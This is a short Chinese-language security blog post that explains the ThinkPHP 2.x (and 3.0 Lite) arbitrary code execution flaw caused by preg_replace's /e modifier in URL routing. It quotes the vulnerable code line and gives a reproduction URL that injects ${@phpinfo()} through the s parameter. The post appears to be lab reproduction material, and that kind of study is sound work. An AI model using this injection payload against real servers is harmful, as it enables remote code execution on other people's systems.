ThinkPHP 2.x 任意代码执行漏洞


ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x 版本中,使用 preg_replace的/e 模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0 版本因为 Lite 模式下没有修复该漏洞,也存在这个漏洞。

漏洞复现

直接访问 http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo()


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Supervisord 远程命令执行漏洞(CVE-2017-11610) Supervisord 远程命令执行漏洞(CVE-2017-11610)
Supervisord 远程命令执行漏洞(CVE-2017-11610)SupervisordSupervisord 是一款 Python 开发,用于管理后台应用(服务)的工具,其角色类似于 Linux 自带的 Systemd。 比 Sys
2019-03-03
下一篇 
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞 ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞ThinkPHP是一款运用极广的 PHP 开发框架。其版本 5 中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命
2019-03-02
  目录